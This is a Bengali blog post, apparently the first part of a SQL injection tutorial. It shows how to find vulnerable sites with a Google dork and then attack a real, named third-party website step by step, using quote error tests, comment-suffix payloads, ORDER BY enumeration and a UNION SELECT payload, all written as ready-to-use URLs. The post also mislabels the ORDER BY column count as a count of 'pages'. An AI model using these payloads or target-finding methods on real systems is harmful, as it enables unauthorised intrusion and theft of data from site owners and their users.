আজকে বেশি কথা বলবো নাহ। আগের টিউন এ একজন চুলকানি দেখাইছে।আমি নাকি তার টিউন চুরি করি, আমি ল্যামার।হ্যান তেন কত কি।
এতহ বার বুঝালাইম আরে ভাই ফেজবুকে একটা গ্রুপ এ একজন এই লেখা টিউন করছে।আমি তার কাছে পারমিশন নিয়া টিউন করছি।আমি কি জানি যে আপনি এই নিয়া গে টিউন করছে।আজাইরা পাব্লিক।
যাই হোক সেইম বিষয়েই আবার টিউন করতে যাচ্ছি।এবং আগের চেয়ে সহজ ও কার্যকর পধতিতে।
আসুন প্রথমে যানি SQLi কি ?
SQLi=Structure Query Language Injection.
সাধারনত ৮০% ওয়েবসাইট এর ডাটাবেস তইরি করা হয় SQL দিয়ে। আর SQLi হল এমন এক Injection পদ্ধতি যা দিয়ে আপনি যেকন SQL ডাটাবেস হ্যাক করতে পারবেন।
আশা করি সবাই ধারনা পায়ে গেছেন :)।
এখন দেখি,কিভাবে বুঝবেন কোন ওয়েবসাইট SQLi পদ্ধতিতে হ্যাক করা সম্ভব কি নাহ।
এর জন্য আমরা Google Dorks এর ব্যবহার করবো।
Inurl:.php?id=
এই dork টা দিয়ে আমরা দুর্বল সাইট খুজবো।
আমরা এখানে ১ম সাইটা নিবো Example হিসাবে।
http://www.cobranet.org/about.php?id=1
এই লিঙ্ক টা ভালো করে লক্ষ করুন।
এখানে id হল একটি প্যারামিটার।বিভিন্ন ওয়েবসাইটে বিভিন্ন প্যারামিটার থাকতে পারে।
এখন আমরা দেখবো এই সাইটা তে SQLi করা যাবে কি নাহ।
এর জন্য আমরা URL টার শেষে(') স্ট্রিং ব্যবহারর করবো।
সব ওয়েবসাইট এ এই স্ট্রিং দিয়ে এরর নাও আস্তে পারে। বিভিন্ন ওয়েবসাইটে বিভিন্ন স্ট্রিং এ এরর দেখায়।
যেমনঃ ', ",),)), /, /*, ইত্যাদি।
http://www.cobranet.org/about.php?id=1 এর শেষে আমরা ' এই স্ট্রিং টা দিয়ে দেখবো এরর আছে কি নাহ।
http://www.cobranet.org/about.php?id=1'
নিচের পিকের মত একটা এরর পাওয়া যায়।
এখন আমরা SQLi শুরু করার জন্য এই এরর টা ফিক্স করবো।
এরর ফিক্স করার জন্য শেষে কিছু Spacial Character ব্যবহার করবো।
যেমনঃ --, -- -, --+, '--+, "--+,)--, %60, ;00%, %23 ইত্যাদি।
উপরের পিক টা দেখেন।
আমরা id=1 এর পরে --+ যোগ করে এরর ফিক্সড করছি।
এখন দেখবো এই ওয়েব সাইটের মোট পেজ কয়টি।
এর জন্য ফিক্সড Query এর মাঝে। মানে --+ এর সামনে আমরা order by Statement ব্যবহার করবো।
যেমন ঃ http://www.cobranet.org/about.php?id=1 OrdEr by 1--+
এইটা বিদ্ধি করে যাইতে হবে যতক্ষন আমারা কোন এরর নাহ পাই।
এই নাম্বারে এরর পাবো তার আগের সংখাটা হবে সাইটের মোট পেজ সংখ্যা।
উদাহারনঃ
http://www.cobranet.org/about.php?id=1 OrDer by 1--+ NO ERROR
http://www.cobranet.org/about.php?id=1 OrDer by 2--+ NO ERROR
http://www.cobranet.org/about.php?id=1 OrDer by 3--+ NO ERROR
http://www.cobranet.org/about.php?id=1 OrDer by 4--+NO ERROR
http://www.cobranet.org/about.php?id=1 OrDer by 5--+NO ERROR
http://www.cobranet.org/about.php?id=1 OrDer by 6--+NO ERROR
http://www.cobranet.org/about.php?id=1 OrDer by 7--+ERROR
তার মানে এখানে মোট পেজ সংখ্যা ৬ টি।
এখন আমরা এর মধ্যে দুর্বল পেজ টা বাহির করবো।
এর জন্য
OrDer By টা কাটে দিয়ে নিচের পিক এর মত UnIoN SeLecT Statement ব্যবহার করতে হবে।
id= এর পরে একটা মাইনাস চিহ্ন(-) তার পরে parameter no তার পরে UnIoN SeLecT 1,2,3,4,5,6--+
তার পরে এন্টার প্রেস করুন।
উপরের পিক এর মত ওয়েব সাইটে 4 আর 2 দেখতে পারবেন।
এগুলা হল সাইটের দুর্বল পেজ নং।
আমারা এগুলাই Inject করবো।
আজকে এই পর্যন্তই, কালকে পরের পার্ট দিবো। 🙂
(দয়া করে কেউ বলবেন নাহ "আমার টিউনে আমি Oder by Statement ব্যবহার করছি।ইহা আমার বাপের সম্পত্তি আপনি চোর চুরি করছেন")
কোন সমস্যা হলে নিচে টিউমেন্ট বক্স তহ আছেই :)।
আর যারা Personally হ্যাকিং শিখতে চান তারা আমার সাথে যোগাযোগ করতে পারেন ঃ
| ফেজবুকে |
অথবা Hacking And Programming School এর ২য় ব্যাচের জন্য ফর্ম ফিল আপ করতে পারেন ঃ
| এইখানে |
আমি শফিকুল ইসলাম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 14 টি টিউন ও 30 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।